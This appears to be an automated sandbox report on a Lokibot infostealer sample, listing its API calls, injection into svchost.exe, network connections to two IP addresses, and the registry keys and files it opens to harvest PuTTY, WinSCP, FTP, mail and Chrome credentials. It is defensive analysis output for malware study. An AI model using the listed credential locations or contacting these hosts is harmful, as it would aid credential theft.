Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 29_2_01D4DDB0 mov eax, dword ptr fs:[00000030h]	29_2_01D4DDB0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 30_2_01577BC8 mov eax, dword ptr fs:[00000030h]	30_2_01577BC8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 30_2_01577B68 mov eax, dword ptr fs:[00000030h]	30_2_01577B68
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 30_2_01576518 mov eax, dword ptr fs:[00000030h]	30_2_01576518
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 31_2_00DA3DD8 mov eax, dword ptr fs:[00000030h]	31_2_00DA3DD8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 31_2_00DA2788 mov eax, dword ptr fs:[00000030h]	31_2_00DA2788
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 31_2_00DA3E38 mov eax, dword ptr fs:[00000030h]	31_2_00DA3E38
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 32_2_01344190 mov eax, dword ptr fs:[00000030h]	32_2_01344190
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 32_2_013441F0 mov eax, dword ptr fs:[00000030h]	32_2_013441F0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 32_2_01342B40 mov eax, dword ptr fs:[00000030h]	32_2_01342B40
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 33_2_01813D90 mov eax, dword ptr fs:[00000030h]	33_2_01813D90
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 33_2_01813D30 mov eax, dword ptr fs:[00000030h]	33_2_01813D30
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 33_2_018126E0 mov eax, dword ptr fs:[00000030h]	33_2_018126E0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 34_2_00C92DD8 mov eax, dword ptr fs:[00000030h]	34_2_00C92DD8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 34_2_00C94488 mov eax, dword ptr fs:[00000030h]	34_2_00C94488
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 34_2_00C94428 mov eax, dword ptr fs:[00000030h]	34_2_00C94428
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 35_2_01412B48 mov eax, dword ptr fs:[00000030h]	35_2_01412B48
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 35_2_014141F8 mov eax, dword ptr fs:[00000030h]	35_2_014141F8
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 35_2_01414198 mov eax, dword ptr fs:[00000030h]	35_2_01414198
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 36_2_017B32E0 mov eax, dword ptr fs:[00000030h]	36_2_017B32E0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 36_2_017B4930 mov eax, dword ptr fs:[00000030h]	36_2_017B4930
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 36_2_017B4990 mov eax, dword ptr fs:[00000030h]	36_2_017B4990
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 37_2_00945310 mov eax, dword ptr fs:[00000030h]	37_2_00945310
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 37_2_00943CC0 mov eax, dword ptr fs:[00000030h]	37_2_00943CC0
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 37_2_00945370 mov eax, dword ptr fs:[00000030h]	37_2_00945370

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00770B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00770B62

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00742622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00742622
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_0073083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0073083F
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_007309D5 SetUnhandledExceptionFilter,	0_2_007309D5
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00730C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00730C21
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00062622
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_0005083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0005083F
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_000509D5 SetUnhandledExceptionFilter,	2_2_000509D5
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Code function: 2_2_00050C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00050C21

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.245.123.11 80			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 194.15.112.248 443			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe

Memory written: C:\Users\user\AppData\Roaming\Dhy2kmz.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 859008

Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe

0_2_00771201

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00752BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00752BA5

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0077B226 SendInput,keybd_event,

0_2_0077B226

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_007922DA

Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9876567899.bat.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe

0_2_00770B62

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00771663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00771663

Source: 9876567899.bat.exe, 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmp, 9876567899.bat.exe, 00000000.00000003.2014356623.0000000003BD1000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000000.2014682434.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 9876567899.bat.exe, palladiums.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00730698 cpuid

0_2_00730698

Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dhy2kmz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dhy2kmz.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_00788195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00788195

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0076D27A GetUserNameW,

0_2_0076D27A

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_0074B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0074B952

Source: C:\Users\user\Desktop\9876567899.bat.exe

Code function: 0_2_007142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007142DE

Source: C:\Users\user\Desktop\9876567899.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6784, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Source: palladiums.exe	Binary or memory string: WIN_81
Source: palladiums.exe	Binary or memory string: WIN_XP
Source: palladiums.exe, 00000023.00000002.2384224017.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: palladiums.exe	Binary or memory string: WIN_XPe
Source: palladiums.exe	Binary or memory string: WIN_VISTA
Source: palladiums.exe	Binary or memory string: WIN_7
Source: palladiums.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00791204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00791204
Source: C:\Users\user\Desktop\9876567899.bat.exe	Code function: 0_2_00791806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00791806
